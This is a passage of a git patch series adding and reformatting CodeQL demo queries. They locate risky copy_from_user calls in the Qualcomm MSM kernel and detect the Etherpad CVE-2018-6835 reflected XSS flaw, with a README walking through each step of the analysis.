..._filter_with_upperbound_and_safe_malloc.ql | 27 +++++++++---------- .../06_stackaddress_dataflow.ql | 12 ++++----- 6 files changed, 40 insertions(+), 52 deletions(-) diff --git a/ql_demos/cpp/Qualcomm-MSM-copy_from_user/01_copy_from_user_annotated.ql b/ql_demos/cpp/Qualcomm-MSM-copy_from_user/01_copy_from_user_annotated.ql index f309fef..ba39de1 100644 --- a/ql_demos/cpp/Qualcomm-MSM-copy_from_user/01_copy_from_user_annotated.ql +++ b/ql_demos/cpp/Qualcomm-MSM-copy_from_user/01_copy_from_user_annotated.ql @@ -18,12 +18,9 @@ import semmle.code.cpp.rangeanalysis.SimpleRangeAnalysis // and the size argument of the kzalloc is the same as the // size argument of copy_from_user. These calls are safe. from FunctionCall call, Expr destArg, Expr sizeArg -where call.getTarget().getName() = "copy_from_user" - and destArg = call.getArgument(0) - and sizeArg = call.getArgument(2) -select - call, - destArg.getType(), - lowerBound(sizeArg), - upperBound(sizeArg), +where + call.getTarget().getName() = "copy_from_user" and + destArg = call.getArgument(0) and + sizeArg = call.getArgument(2) +select call, destArg.getType(), lowerBound(sizeArg), upperBound(sizeArg), call.getFile().getRelativePath() diff --git a/ql_demos/cpp/Qualcomm-MSM-copy_from_user/02_filter_with_upperbound.ql b/ql_demos/cpp/Qualcomm-MSM-copy_from_user/02_filter_with_upperbound.ql index ee1e6ea..8161ee2 100644 --- a/ql_demos/cpp/Qualcomm-MSM-copy_from_user/02_filter_with_upperbound.ql +++ b/ql_demos/cpp/Qualcomm-MSM-copy_from_user/02_filter_with_upperbound.ql @@ -16,13 +16,10 @@ import semmle.code.cpp.rangeanalysis.SimpleRangeAnalysis // copy_from_user(&s, usrptr, sizeof(s)); // ``` from FunctionCall call, Expr destArg, Expr sizeArg -where call.getTarget().getName() = "copy_from_user" -and destArg = call.getArgument(0) -and sizeArg = call.getArgument(2) -and not (destArg.getType().(PointerType).getBaseType().getSize() >= upperBound(sizeArg)) -select - call, - destArg.getType(), - lowerBound(sizeArg), - upperBound(sizeArg), +where + call.getTarget().getName() = "copy_from_user" and + destArg = call.getArgument(0) and + sizeArg = call.getArgument(2) and + not destArg.getType().(PointerType).getBaseType().getSize() >= upperBound(sizeArg) +select call, destArg.getType(), lowerBound(sizeArg), upperBound(sizeArg), call.getFile().getRelativePath() diff --git a/ql_demos/cpp/Qualcomm-MSM-copy_from_user/03_filter_with_upperbound.ql b/ql_demos/cpp/Qualcomm-MSM-copy_from_user/03_filter_with_upperbound.ql index 302d025..0a5e35a 100644 --- a/ql_demos/cpp/Qualcomm-MSM-copy_from_user/03_filter_with_upperbound.ql +++ b/ql_demos/cpp/Qualcomm-MSM-copy_from_user/03_filter_with_upperbound.ql @@ -18,14 +18,11 @@ import semmle.code.cpp.rangeanalysis.SimpleRangeAnalysis // copy_from_user(s, usrptr, sizeof(s)); // ``` from FunctionCall call, Expr destArg, Expr sizeArg -where call.getTarget().getName() = "copy_from_user" -and destArg = call.getArgument(0) -and sizeArg = call.getArgument(2) -and not (destArg.getType().(PointerType).getBaseType().getSize() >= upperBound(sizeArg)) -and not (destArg.getType().(ArrayType).getSize() >= upperBound(sizeArg)) -select - call, - destArg.getType(), - lowerBound(sizeArg), - upperBound(sizeArg), +where + call.getTarget().getName() = "copy_from_user" and + destArg = call.getArgument(0) and + sizeArg = call.getArgument(2) and + not destArg.getType().(PointerType).getBaseType().getSize() >= upperBound(sizeArg) and + not destArg.getType().(ArrayType).getSize() >= upperBound(sizeArg) +select call, destArg.getType(), lowerBound(sizeArg), upperBound(sizeArg), call.getFile().getRelativePath() diff --git a/ql_demos/cpp/Qualcomm-MSM-copy_from_user/04_safe_malloc.ql b/ql_demos/cpp/Qualcomm-MSM-copy_from_user/04_safe_malloc.ql index 2e5da27..a89b920 100644 --- a/ql_demos/cpp/Qualcomm-MSM-copy_from_user/04_safe_malloc.ql +++ b/ql_demos/cpp/Qualcomm-MSM-copy_from_user/04_safe_malloc.ql @@ -20,14 +20,14 @@ import semmle.code.cpp.dataflow.DataFlow // In the next query, we'll use `safe_malloc` to filter those // calls out, because they are safe. predicate safe_malloc(FunctionCall allocCall, FunctionCall copy_from_user) { - exists (DataFlow::Node source, DataFlow::Node sink - | allocCall.getTarget().getName() = "kzalloc" and + exists(DataFlow::Node source, DataFlow::Node sink | + allocCall.getTarget().getName() = "kzalloc" and copy_from_user.getTarget().getName() = "copy_from_user" and source.asExpr() = allocCall and sink.asExpr() = copy_from_user.getArgument(0) and DataFlow::localFlow(source, sink) and - globalValueNumber(allocCall.getArgument(0)) = - globalValueNumber(copy_from_user.getArgument(2))) + globalValueNumber(allocCall.getArgument(0)) = globalValueNumber(copy_from_user.getArgument(2)) + ) } from FunctionCall allocCall, FunctionCall copy_from_user diff --git a/ql_demos/cpp/Qualcomm-MSM-copy_from_user/05_filter_with_upperbound_and_safe_malloc.ql b/ql_demos/cpp/Qualcomm-MSM-copy_from_user/05_filter_with_upperbound_and_safe_malloc.ql index df5271d..a5e262a 100644 --- a/ql_demos/cpp/Qualcomm-MSM-copy_from_user/05_filter_with_upperbound_and_safe_malloc.ql +++ b/ql_demos/cpp/Qualcomm-MSM-copy_from_user/05_filter_with_upperbound_and_safe_malloc.ql @@ -15,27 +15,24 @@ import semmle.code.cpp.dataflow.DataFlow // We wrote this predicate in the previous query. predicate safe_malloc(FunctionCall allocCall, FunctionCall copy_from_user) { - exists (DataFlow::Node source, DataFlow::Node sink - | allocCall.getTarget().getName() = "kzalloc" and + exists(DataFlow::Node source, DataFlow::Node sink | + allocCall.getTarget().getName() = "kzalloc" and copy_from_user.getTarget().getName() = "copy_from_user" and source.asExpr() = allocCall and sink.asExpr() = copy_from_user.getArgument(0) and DataFlow::localFlow(source, sink) and - globalValueNumber(allocCall.getArgument(0)) = - globalValueNumber(copy_from_user.getArgument(2))) + globalValueNumber(allocCall.getArgument(0)) = globalValueNumber(copy_from_user.getArgument(2)) + ) } // Add a filter to remove results that match the `safe_malloc` pattern. from FunctionCall call, Expr destArg, Expr sizeArg -where call.getTarget().getName() = "copy_from_user" -and destArg = call.getArgument(0) -and sizeArg = call.getArgument(2) -and not (destArg.getType().(PointerType).getBaseType().getSize() >= upperBound(sizeArg)) -and not (destArg.getType().(ArrayType).getSize() >= upperBound(sizeArg)) -and not safe_malloc(_, call) -select - call, - destArg.getType(), - lowerBound(sizeArg), - upperBound(sizeArg), +where + call.getTarget().getName() = "copy_from_user" and + destArg = call.getArgument(0) and + sizeArg = call.getArgument(2) and + not destArg.getType().(PointerType).getBaseType().getSize() >= upperBound(sizeArg) and + not destArg.getType().(ArrayType).getSize() >= upperBound(sizeArg) and + not safe_malloc(_, call) +select call, destArg.getType(), lowerBound(sizeArg), upperBound(sizeArg), call.getFile().getRelativePath() diff --git a/ql_demos/cpp/Qualcomm-MSM-copy_from_user/06_stackaddress_dataflow.ql b/ql_demos/cpp/Qualcomm-MSM-copy_from_user/06_stackaddress_dataflow.ql index 891e387..5d62091 100644 --- a/ql_demos/cpp/Qualcomm-MSM-copy_from_user/06_stackaddress_dataflow.ql +++ b/ql_demos/cpp/Qualcomm-MSM-copy_from_user/06_stackaddress_dataflow.ql @@ -16,19 +16,19 @@ class Config extends DataFlow::Configuration { Config() { this = "copy_from_user" } override predicate isSource(DataFlow::Node source) { - exists (LocalVariable v - | source.asExpr().(AddressOfExpr).getOperand() = v.getAnAccess()) + exists(LocalVariable v | source.asExpr().(AddressOfExpr).getOperand() = v.getAnAccess()) } override predicate isSink(DataFlow::Node sink) { // This is the logic that was previously in the select clause of the query. - exists (FunctionCall call, Expr destArg, Expr sizeArg - | call.getTarget().getName() = "copy_from_user" and + exists(FunctionCall call, Expr destArg, Expr sizeArg | + call.getTarget().getName() = "copy_from_user" and destArg = sink.asExpr() and destArg = call.getArgument(0) and sizeArg = call.getArgument(2) and - not (destArg.getType().(PointerType).getBaseType().getSize() >= upperBound(sizeArg)) and - not (destArg.getType().(ArrayType).getSize() >= upperBound(sizeArg))) + not destArg.getType().(PointerType).getBaseType().getSize() >= upperBound(sizeArg) and + not destArg.getType().(ArrayType).getSize() >= upperBound(sizeArg) + ) } } From 661a69174b1585731c8bde190f7a5acc7d17a277 Mon Sep 17 00:00:00 2001 From: Jonas Jensen Date: Thu, 28 Feb 2019 11:46:05 +0100 Subject: [PATCH 09/36] MSM: Remove @problem.severity tags with no effect --- ql_demos/cpp/Qualcomm-MSM-copy_from_user/00_copy_from_user.ql | 1 - .../Qualcomm-MSM-copy_from_user/01_copy_from_user_annotated.ql | 1 - .../cpp/Qualcomm-MSM-copy_from_user/02_filter_with_upperbound.ql | 1 - .../cpp/Qualcomm-MSM-copy_from_user/03_filter_with_upperbound.ql | 1 - ql_demos/cpp/Qualcomm-MSM-copy_from_user/04_safe_malloc.ql | 1 - .../05_filter_with_upperbound_and_safe_malloc.ql | 1 - 6 files changed, 6 deletions(-) diff --git a/ql_demos/cpp/Qualcomm-MSM-copy_from_user/00_copy_from_user.ql b/ql_demos/cpp/Qualcomm-MSM-copy_from_user/00_copy_from_user.ql index 616560f..bb97da8 100644 --- a/ql_demos/cpp/Qualcomm-MSM-copy_from_user/00_copy_from_user.ql +++ b/ql_demos/cpp/Qualcomm-MSM-copy_from_user/00_copy_from_user.ql @@ -1,7 +1,6 @@ /** * @name Calls to copy_from_user * @description Find all calls to copy_from_user. - * @problem.severity warning */ import cpp diff --git a/ql_demos/cpp/Qualcomm-MSM-copy_from_user/01_copy_from_user_annotated.ql b/ql_demos/cpp/Qualcomm-MSM-copy_from_user/01_copy_from_user_annotated.ql index ba39de1..78cf5da 100644 --- a/ql_demos/cpp/Qualcomm-MSM-copy_from_user/01_copy_from_user_annotated.ql +++ b/ql_demos/cpp/Qualcomm-MSM-copy_from_user/01_copy_from_user_annotated.ql @@ -2,7 +2,6 @@ * @name Annotate with types and bounds * @description Find all calls to copy_from_user and annotates them with their * type and inferred size bounds. - * @problem.severity warning */ import cpp diff --git a/ql_demos/cpp/Qualcomm-MSM-copy_from_user/02_filter_with_upperbound.ql b/ql_demos/cpp/Qualcomm-MSM-copy_from_user/02_filter_with_upperbound.ql index 8161ee2..04f23a7 100644 --- a/ql_demos/cpp/Qualcomm-MSM-copy_from_user/02_filter_with_upperbound.ql +++ b/ql_demos/cpp/Qualcomm-MSM-copy_from_user/02_filter_with_upperbound.ql @@ -3,7 +3,6 @@ * @description This query excludes results that are safe because the upper * bound of the size argument is less than or equal to the size of * the destination variable. - * @problem.severity warning */ import cpp diff --git a/ql_demos/cpp/Qualcomm-MSM-copy_from_user/03_filter_with_upperbound.ql b/ql_demos/cpp/Qualcomm-MSM-copy_from_user/03_filter_with_upperbound.ql index 0a5e35a..1fb3bab 100644 --- a/ql_demos/cpp/Qualcomm-MSM-copy_from_user/03_filter_with_upperbound.ql +++ b/ql_demos/cpp/Qualcomm-MSM-copy_from_user/03_filter_with_upperbound.ql @@ -3,7 +3,6 @@ * @description This query excludes results that are safe because the upper * bound of the size argument is less than or equal to the size of * the destination variable or array. - * @problem.severity warning */ import cpp diff --git a/ql_demos/cpp/Qualcomm-MSM-copy_from_user/04_safe_malloc.ql b/ql_demos/cpp/Qualcomm-MSM-copy_from_user/04_safe_malloc.ql index a89b920..ede596a 100644 --- a/ql_demos/cpp/Qualcomm-MSM-copy_from_user/04_safe_malloc.ql +++ b/ql_demos/cpp/Qualcomm-MSM-copy_from_user/04_safe_malloc.ql @@ -2,7 +2,6 @@ * @name kzalloc only * @description If the copy_from_user is preceded by a kzalloc of the correct * size, then it is safe. To demonstrate, find only those results. - * @problem.severity warning */ import cpp diff --git a/ql_demos/cpp/Qualcomm-MSM-copy_from_user/05_filter_with_upperbound_and_safe_malloc.ql b/ql_demos/cpp/Qualcomm-MSM-copy_from_user/05_filter_with_upperbound_and_safe_malloc.ql index a5e262a..eccddfa 100644 --- a/ql_demos/cpp/Qualcomm-MSM-copy_from_user/05_filter_with_upperbound_and_safe_malloc.ql +++ b/ql_demos/cpp/Qualcomm-MSM-copy_from_user/05_filter_with_upperbound_and_safe_malloc.ql @@ -5,7 +5,6 @@ * the destination variable or array. It also excludes results * that are safe because the right amount of memory was allocated * with kzalloc. - * @problem.severity warning */ import cpp From 357dbc438cd6ba019145f7af0cf8398b5cb1f59d Mon Sep 17 00:00:00 2001 From: Max Schaefer Date: Mon, 11 Mar 2019 12:09:29 +0000 Subject: [PATCH 10/36] Add alternative demo for Etherpad RFD vulnerability. --- .../alternative/01_ReflectedXss.ql | 15 +++ .../alternative/02_SwaggerRouteHandler.ql | 34 +++++++ .../alternative/03_ResponseSendArgument.ql | 34 +++++++ .../alternative/04_ResponseSendAccess.ql | 35 +++++++ .../05_ResponseSendArgumentWithAliasing.ql | 68 +++++++++++++ .../alternative/06_ReflectedXss.ql | 79 +++++++++++++++ .../07_ReflectedXssWithSanitizer.ql | 95 +++++++++++++++++++ .../alternative/README.md | 36 +++++++ 8 files changed, 396 insertions(+) create mode 100644 ql_demos/javascript/Etherpad_CVE-2018-6835/alternative/01_ReflectedXss.ql create mode 100644 ql_demos/javascript/Etherpad_CVE-2018-6835/alternative/02_SwaggerRouteHandler.ql create mode 100644 ql_demos/javascript/Etherpad_CVE-2018-6835/alternative/03_ResponseSendArgument.ql create mode 100644 ql_demos/javascript/Etherpad_CVE-2018-6835/alternative/04_ResponseSendAccess.ql create mode 100644 ql_demos/javascript/Etherpad_CVE-2018-6835/alternative/05_ResponseSendArgumentWithAliasing.ql create mode 100644 ql_demos/javascript/Etherpad_CVE-2018-6835/alternative/06_ReflectedXss.ql create mode 100644 ql_demos/javascript/Etherpad_CVE-2018-6835/alternative/07_ReflectedXssWithSanitizer.ql create mode 100644 ql_demos/javascript/Etherpad_CVE-2018-6835/alternative/README.md diff --git a/ql_demos/javascript/Etherpad_CVE-2018-6835/alternative/01_ReflectedXss.ql b/ql_demos/javascript/Etherpad_CVE-2018-6835/alternative/01_ReflectedXss.ql new file mode 100644 index 0000000..1a6a0f1 --- /dev/null +++ b/ql_demos/javascript/Etherpad_CVE-2018-6835/alternative/01_ReflectedXss.ql @@ -0,0 +1,15 @@ +/** + * @name Reflected cross-site scripting vulnerability + * @kind path-problem + * @problem.severity warning + * @id js/reflected-xss + */ + +import javascript +import semmle.javascript.security.dataflow.ReflectedXss::ReflectedXss +import DataFlow::PathGraph + +from Configuration cfg, DataFlow::PathNode source, DataFlow::PathNode sink +where cfg.hasFlowPath(source, sink) +select sink.getNode(), source, sink, "Cross-site scripting vulnerability due to $@.", + source.getNode(), "user-provided value" diff --git a/ql_demos/javascript/Etherpad_CVE-2018-6835/alternative/02_SwaggerRouteHandler.ql b/ql_demos/javascript/Etherpad_CVE-2018-6835/alternative/02_SwaggerRouteHandler.ql new file mode 100644 index 0000000..8ee8c58 --- /dev/null +++ b/ql_demos/javascript/Etherpad_CVE-2018-6835/alternative/02_SwaggerRouteHandler.ql @@ -0,0 +1,34 @@ +import javascript + +/** Gets a data flow node that represents an instance of `swagger-node`. */ +DataFlow::Node swaggerInstance() { + result = DataFlow::moduleImport("swagger-node-express") + or + result.getAPredecessor() = swaggerInstance() + or + result.(DataFlow::CallNode).getACallee().getAReturnedExpr() = swaggerInstance().asExpr() + or + result.(DataFlow::MethodCallNode).calls(swaggerInstance(), "createNew") +} + +/** An Express route handler installed via `swagger-node`. */ +class SwaggerRouteHandler extends Express::RouteHandler, DataFlow::FunctionNode { + SwaggerRouteHandler() { + exists(DataFlow::MethodCallNode addGet, DataFlow::ObjectLiteralNode resource | + addGet.calls(swaggerInstance(), "addGet") and + resource = addGet.getArgument(0).getALocalSource() and + this = resource.getAPropertySource("action") + ) + } + + override SimpleParameter getRouteHandlerParameter(string kind) { + kind = "request" and result = getParameter(0).getParameter() + or + kind = "response" and result = getParameter(1).getParameter() + } + + override HTTP::HeaderDefinition getAResponseHeader(string name) { none() } +} + +from SwaggerRouteHandler srh +select srh diff --git a/ql_demos/javascript/Etherpad_CVE-2018-6835/alternative/03_ResponseSendArgument.ql b/ql_demos/javascript/Etherpad_CVE-2018-6835/alternative/03_ResponseSendArgument.ql new file mode 100644 index 0000000..ed41454 --- /dev/null +++ b/ql_demos/javascript/Etherpad_CVE-2018-6835/alternative/03_ResponseSendArgument.ql @@ -0,0 +1,34 @@ +import javascript + +/** Gets a data flow node that represents an instance of `swagger-node`. */ +DataFlow::Node swaggerInstance() { + result = DataFlow::moduleImport("swagger-node-express") + or + result.getAPredecessor() = swaggerInstance() + or + result.(DataFlow::CallNode).getACallee().getAReturnedExpr() = swaggerInstance().asExpr() + or + result.(DataFlow::MethodCallNode).calls(swaggerInstance(), "createNew") +} + +/** An Express route handler installed via `swagger-node`. */ +class SwaggerRouteHandler extends Express::RouteHandler, DataFlow::FunctionNode { + SwaggerRouteHandler() { + exists(DataFlow::MethodCallNode addGet, DataFlow::ObjectLiteralNode resource | + addGet.calls(swaggerInstance(), "addGet") and + resource = addGet.getArgument(0).getALocalSource() and + this = resource.getAPropertySource("action") + ) + } + + override SimpleParameter getRouteHandlerParameter(string kind) { + kind = "request" and result = getParameter(0).getParameter() + or + kind = "response" and result = getParameter(1).getParameter() + } + + override HTTP::HeaderDefinition getAResponseHeader(string name) { none() } +} + +from HTTP::ResponseSendArgument rsa +select rsa diff --git a/ql_demos/javascript/Etherpad_CVE-2018-6835/alternative/04_ResponseSendAccess.ql b/ql_demos/javascript/Etherpad_CVE-2018-6835/alternative/04_ResponseSendAccess.ql new file mode 100644 index 0000000..5b4333f --- /dev/null +++ b/ql_demos/javascript/Etherpad_CVE-2018-6835/alternative/04_ResponseSendAccess.ql @@ -0,0 +1,35 @@ +import javascript + +/** Gets a data flow node that represents an instance of `swagger-node`. */ +DataFlow::Node swaggerInstance() { + result = DataFlow::moduleImport("swagger-node-express") + or + result.getAPredecessor() = swaggerInstance() + or + result.(DataFlow::CallNode).getACallee().getAReturnedExpr() = swaggerInstance().asExpr() + or + result.(DataFlow::MethodCallNode).calls(swaggerInstance(), "createNew") +} + +/** An Express route handler installed via `swagger-node`. */ +class SwaggerRouteHandler extends Express::RouteHandler, DataFlow::FunctionNode { + SwaggerRouteHandler() { + exists(DataFlow::MethodCallNode addGet, DataFlow::ObjectLiteralNode resource | + addGet.calls(swaggerInstance(), "addGet") and + resource = addGet.getArgument(0).getALocalSource() and + this = resource.getAPropertySource("action") + ) + } + + override SimpleParameter getRouteHandlerParameter(string kind) { + kind = "request" and result = getParameter(0).getParameter() + or + kind = "response" and result = getParameter(1).getParameter() + } + + override HTTP::HeaderDefinition getAResponseHeader(string name) { none() } +} + +from SwaggerRouteHandler rh, PropAccess send +where send.accesses(rh.getAResponseExpr(), "send") +select send diff --git a/ql_demos/javascript/Etherpad_CVE-2018-6835/alternative/05_ResponseSendArgumentWithAliasing.ql b/ql_demos/javascript/Etherpad_CVE-2018-6835/alternative/05_ResponseSendArgumentWithAliasing.ql new file mode 100644 index 0000000..f4dcfed --- /dev/null +++ b/ql_demos/javascript/Etherpad_CVE-2018-6835/alternative/05_ResponseSendArgumentWithAliasing.ql @@ -0,0 +1,68 @@ +import javascript + +/** Gets a data flow node that represents an instance of `swagger-node`. */ +DataFlow::Node swaggerInstance() { + result = DataFlow::moduleImport("swagger-node-express") + or + result.getAPredecessor() = swaggerInstance() + or + result.(DataFlow::CallNode).getACallee().getAReturnedExpr() = swaggerInstance().asExpr() + or + result.(DataFlow::MethodCallNode).calls(swaggerInstance(), "createNew") +} + +/** An Express route handler installed via `swagger-node`. */ +class SwaggerRouteHandler extends Express::RouteHandler, DataFlow::FunctionNode { + SwaggerRouteHandler() { + exists(DataFlow::MethodCallNode addGet, DataFlow::ObjectLiteralNode resource | + addGet.calls(swaggerInstance(), "addGet") and + resource = addGet.getArgument(0).getALocalSource() and + this = resource.getAPropertySource("action") + ) + } + + override SimpleParameter getRouteHandlerParameter(string kind) { + kind = "request" and result = getParameter(0).getParameter() + or + kind = "response" and result = getParameter(1).getParameter() + } + + override HTTP::HeaderDefinition getAResponseHeader(string name) { none() } +} + +/** Holds if `name` may be an alias for the `send` method on `res`. */ +predicate sendMethodName(HTTP::Servers::ResponseSource res, string name) { + name = "send" + or + exists (DataFlow::PropWrite pw | + res.flowsTo(pw.getBase()) and + pw.getPropertyName() = name and + sendMethodRef(pw.getRhs(), res) + ) +} + +/** Holds if `pr` may be an access to the `send` method on `res`. */ +predicate sendMethodRef(DataFlow::PropRead pr, HTTP::Servers::ResponseSource res) { + res.flowsTo(pr.getBase()) and + sendMethodName(res, pr.getPropertyName()) +} + +/** Recognize potentially aliased calls to `send`. */ +class PotentiallyAliasedResponseSendArgument extends HTTP::ResponseSendArgument { + HTTP::RouteHandler rh; + + PotentiallyAliasedResponseSendArgument() { + exists (DataFlow::CallNode call, HTTP::Servers::ResponseSource res | + sendMethodRef(call.getCalleeNode(), res) and + rh = res.getRouteHandler() and + this = call.getArgument(0).asExpr() + ) + } + + override HTTP::RouteHandler getRouteHandler() { + result = rh + } +} + +from PotentiallyAliasedResponseSendArgument arg +select arg diff --git a/ql_demos/javascript/Etherpad_CVE-2018-6835/alternative/06_ReflectedXss.ql b/ql_demos/javascript/Etherpad_CVE-2018-6835/alternative/06_ReflectedXss.ql new file mode 100644 index 0000000..046c583 --- /dev/null +++ b/ql_demos/javascript/Etherpad_CVE-2018-6835/alternative/06_ReflectedXss.ql @@ -0,0 +1,79 @@ +/** + * @name Reflected cross-site scripting vulnerability + * @kind path-problem + * @problem.severity warning + * @id js/reflected-xss + */ + +import javascript +import semmle.javascript.security.dataflow.ReflectedXss::ReflectedXss +import DataFlow::PathGraph + +/** Gets a data flow node that represents an instance of `swagger-node`. */ +DataFlow::Node swaggerInstance() { + result = DataFlow::moduleImport("swagger-node-express") + or + result.getAPredecessor() = swaggerInstance() + or + result.(DataFlow::CallNode).getACallee().getAReturnedExpr() = swaggerInstance().asExpr() + or + result.(DataFlow::MethodCallNode).calls(swaggerInstance(), "createNew") +} + +/** An Express route handler installed via `swagger-node`. */ +class SwaggerRouteHandler extends Express::RouteHandler, DataFlow::FunctionNode { + SwaggerRouteHandler() { + exists(DataFlow::MethodCallNode addGet, DataFlow::ObjectLiteralNode resource | + addGet.calls(swaggerInstance(), "addGet") and + resource = addGet.getArgument(0).getALocalSource() and + this = resource.getAPropertySource("action") + ) + } + + override SimpleParameter getRouteHandlerParameter(string kind) { + kind = "request" and result = getParameter(0).getParameter() + or + kind = "response" and result = getParameter(1).getParameter() + } + + override HTTP::HeaderDefinition getAResponseHeader(string name) { none() } +} + +/** Holds if `name` may be an alias for the `send` method on `res`. */ +predicate sendMethodName(HTTP::Servers::ResponseSource res, string name) { + name = "send" + or + exists (DataFlow::PropWrite pw | + res.flowsTo(pw.getBase()) and + pw.getPropertyName() = name and + sendMethodRef(pw.getRhs(), res) + ) +} + +/** Holds if `pr` may be an access to the `send` method on `res`. */ +predicate sendMethodRef(DataFlow::PropRead pr, HTTP::Servers::ResponseSource res) { + res.flowsTo(pr.getBase()) and + sendMethodName(res, pr.getPropertyName()) +} + +/** Recognize potentially aliased calls to `send`. */ +class PotentiallyAliasedResponseSendArgument extends HTTP::ResponseSendArgument { + HTTP::RouteHandler rh; + + PotentiallyAliasedResponseSendArgument() { + exists (DataFlow::CallNode call, HTTP::Servers::ResponseSource res | + sendMethodRef(call.getCalleeNode(), res) and + rh = res.getRouteHandler() and + this = call.getArgument(0).asExpr() + ) + } + + override HTTP::RouteHandler getRouteHandler() { + result = rh + } +} + +from Configuration cfg, DataFlow::PathNode source, DataFlow::PathNode sink +where cfg.hasFlowPath(source, sink) +select sink.getNode(), source, sink, "Cross-site scripting vulnerability due to $@.", + source.getNode(), "user-provided value" diff --git a/ql_demos/javascript/Etherpad_CVE-2018-6835/alternative/07_ReflectedXssWithSanitizer.ql b/ql_demos/javascript/Etherpad_CVE-2018-6835/alternative/07_ReflectedXssWithSanitizer.ql new file mode 100644 index 0000000..02a2a55 --- /dev/null +++ b/ql_demos/javascript/Etherpad_CVE-2018-6835/alternative/07_ReflectedXssWithSanitizer.ql @@ -0,0 +1,95 @@ +/** + * @name Reflected cross-site scripting vulnerability + * @kind path-problem + * @problem.severity warning + * @id js/reflected-xss + */ + +import javascript +import semmle.javascript.security.dataflow.ReflectedXss::ReflectedXss +import DataFlow::PathGraph + +/** Gets a data flow node that represents an instance of `swagger-node`. */ +DataFlow::Node swaggerInstance() { + result = DataFlow::moduleImport("swagger-node-express") + or + result.getAPredecessor() = swaggerInstance() + or + result.(DataFlow::CallNode).getACallee().getAReturnedExpr() = swaggerInstance().asExpr() + or + result.(DataFlow::MethodCallNode).calls(swaggerInstance(), "createNew") +} + +/** An Express route handler installed via `swagger-node`. */ +class SwaggerRouteHandler extends Express::RouteHandler, DataFlow::FunctionNode { + SwaggerRouteHandler() { + exists(DataFlow::MethodCallNode addGet, DataFlow::ObjectLiteralNode resource | + addGet.calls(swaggerInstance(), "addGet") and + resource = addGet.getArgument(0).getALocalSource() and + this = resource.getAPropertySource("action") + ) + } + + override SimpleParameter getRouteHandlerParameter(string kind) { + kind = "request" and result = getParameter(0).getParameter() + or + kind = "response" and result = getParameter(1).getParameter() + } + + override HTTP::HeaderDefinition getAResponseHeader(string name) { none() } +} + +/** Holds if `name` may be an alias for the `send` method on `res`. */ +predicate sendMethodName(HTTP::Servers::ResponseSource res, string name) { + name = "send" + or + exists (DataFlow::PropWrite pw | + res.flowsTo(pw.getBase()) and + pw.getPropertyName() = name and + sendMethodRef(pw.getRhs(), res) + ) +} + +/** Holds if `pr` may be an access to the `send` method on `res`. */ +predicate sendMethodRef(DataFlow::PropRead pr, HTTP::Servers::ResponseSource res) { + res.flowsTo(pr.getBase()) and + sendMethodName(res, pr.getPropertyName()) +} + +/** Recognize potentially aliased calls to `send`. */ +class PotentiallyAliasedResponseSendArgument extends HTTP::ResponseSendArgument { + HTTP::RouteHandler rh; + + PotentiallyAliasedResponseSendArgument() { + exists (DataFlow::CallNode call, HTTP::Servers::ResponseSource res | + sendMethodRef(call.getCalleeNode(), res) and + rh = res.getRouteHandler() and + this = call.getArgument(0).asExpr() + ) + } + + override HTTP::RouteHandler getRouteHandler() { + result = rh + } +} + +/** A call to `is-var-name`, considered as a sanitizer for untrusted user input. */ +class IsVarNameSanitizer extends TaintTracking::AdditionalSanitizerGuardNode, DataFlow::CallNode { + IsVarNameSanitizer() { + this = DataFlow::moduleImport("is-var-name").getACall() + } + + override predicate appliesTo(TaintTracking::Configuration cfg) { + any() + } + + override predicate sanitizes(boolean outcome, Expr e) { + outcome = true and + e = getArgument(0).asExpr() + } +} + +from Configuration cfg, DataFlow::PathNode source, DataFlow::PathNode sink +where cfg.hasFlowPath(source, sink) +select sink.getNode(), source, sink, "Cross-site scripting vulnerability due to $@.", + source.getNode(), "user-provided value" diff --git a/ql_demos/javascript/Etherpad_CVE-2018-6835/alternative/README.md b/ql_demos/javascript/Etherpad_CVE-2018-6835/alternative/README.md new file mode 100644 index 0000000..96ee549 --- /dev/null +++ b/ql_demos/javascript/Etherpad_CVE-2018-6835/alternative/README.md @@ -0,0 +1,36 @@ +This is an alternative presentation of the query from the blog post about +[Detecting Reflected File Download vulnerabilities using QL](https://lgtm.com/blog/etherpad_CVE-2018-6835), +phrasing it as a customization of Semmle's standard Reflected XSS query. + +Use [this snapshot](https://downloads.lgtm.com/snapshots/javascript/ether/etherpad-lite/Etherpad_1.6.2.zip) (etherpad-lite v1.6.2) +for the initial stages of the development. All snapshots were built using version 1.9.3 of the Semmle toolchain; if you are using +1.20 or newer you will need to upgrade them. + + - [01_ReflectedXss.ql](01_ReflectedXss.ql): The standard query; finds nothing. The reason is that etherpad-lite uses + [Swagger](https://www.npmjs.com/package/swagger-node-express) for implementing its REST API, which is not supported out of the box. + The next few queries build up a basic model of Swagger that is rich enough to find the vulnerability. + - [02_SwaggerRouteHandler.ql](02_SwaggerRouteHandler.ql): A query for finding places where Swagger is used to install an + Express HTTP route handler. Note that the newly introduced class extends `Express::RouteHandler` from the standard library, + so the standard HTTP server model can now be used to reason about Swagger-based APIs. + - [03_ResponseSendArgument.ql](03_ResponseSendArgument.ql): A query for finding HTTP responses using the standard HTTP + server model plus the extension developed in the previous query. Results are disappointing. + - [04_ResponseSendAccess.ql](04_ResponseSendAccess.ql): To figure out what's going on, we instead just look for all + references to the HTTP `send` method. The results show that etherpad-lite wraps that method and replaces it with a custom + send method that ultimately delegates to the standard method. + - [05_ResponseSendArgumentWithAliasing.ql](05_ResponseSendArgumentWithAliasing.ql): We can model this wrapping process, + yielding an improved version of `03_ResponseSendArgument.ql`. + - [06_ReflectedXss.ql](06_ReflectedXss.ql): Including all of the above extensions in the standard XSS query finds a + true-positive result. This is the one we reported. + +The developers [fixed](https://github.com/ether/etherpad-lite/commit/a2992b3) the vulnerability by introducing a sanitizer using the +[is-var-name](https://www.npmjs.com/package/is-var-name) npm package. +[This snapshot](https://downloads.lgtm.com/snapshots/javascript/ether/etherpad-lite/Etherpad_a2992b3.zip) corresponds to the fix commit. + +The standard library does not include a model for `is-var-name` (it is not a very widely used package), but +[07_ReflectedXssWithSanitizer.ql](07_ReflectedXssWithSanitizer.ql) shows that it is very easy to add, making +the result go away. + +Later on, this sanitizer was [replaced](https://github.com/ether/etherpad-lite/commit/dd7894d) with a custom sanitizer, which is, +unfortunately, ineffective. ([This snapshot](https://downloads.lgtm.com/snapshots/javascript/ether/etherpad-lite/Etherpad_1.6.4.zip) +of etherpad-lite v1.6.4 contains the new sanitizer.) However, all browsers mitigate against reflected file download +vulnerabilities these days, so while the vulnerability still exists, it is no longer exploitable. From bd42c5a07a6c05ce40337f1ece752204c5d9b433 Mon Sep 17 00:00:00 2001 From: james Date: Fri, 15 Mar 2019 